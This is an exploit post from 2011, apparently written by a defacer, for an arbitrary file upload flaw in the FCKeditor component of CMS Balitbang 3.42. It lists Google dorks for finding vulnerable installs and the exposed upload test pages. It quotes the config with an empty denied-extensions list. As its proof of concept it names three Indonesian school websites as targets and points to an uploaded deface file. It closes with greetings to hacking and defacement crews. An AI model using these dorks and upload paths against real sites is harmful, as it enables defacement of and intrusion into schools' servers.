Title Exploited : CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit
Author Exploit : the_cyber_nuxbie
Time & Date : 2011-04-26
============================================================================================================
| CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit | #[~] Author : the_cyber_nuxbie #[~] Home : www.thecybernuxbie.com #[~] E-mail : nuxbie@sekuritionline.net #[~] Found : 06 April 2011. #[~] Version: CMS Balitbang 3.42. #[~] Tested : Windows 7 Ultimate 32bit. #[~] Link : http://www.kajianwebsite.org/download/cms-balitbang.rar #[!] Dork : inurl:"/html/siswa.php?" inurl:"/html/alumni.php?" inurl:"/html/guru.php?" ______________________________________________________________ #[~] Exploited: http://public_html/dir/editor/filemanager/connectors/uploadtest.html http://public_html/dir/editor/filemanager/connectors/test.html http://public_html/dir/editor/filemanager/browser/default/browser.html #[~] Directory: http://public_html/userfiles/file/file-deface.txt Setting: "editor/filemanager/connectors/php/config.php" $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; $Config['DeniedExtensions']['File'] = array() ; $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] . 'file/' ; $Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ; $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ; $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ; - P.o.C: 1. Target: Special Site:.sch.id (indonesian). http://www.sma-magelang.sch.id http://www.smp-banjar.sch.id http://www.sma3-pesantren.sch.id 2. http://www.sma-magelang.sch.id/editor/filemanager/connectors/test.html http://www.sma-magelang.sch.id/editor/filemanager/connectors/uploadtest.html 3. Find Your Files: http://www.sma-magelang.sch.id/userfiles/file/h4ck3d.txt - Greetz: All Member YogyaFamilyCode. All Member IndonesianDefacer. All Member IndonesianCoder. All Member MagelangCyber. All Member Devilzc0de. All Member Hacker-Newbie. All Member Jatim-Crew. All Member Fast-Hacker - April 7 2011, GMT +07:00 Solo Raya, Indonesia.============================================================================================================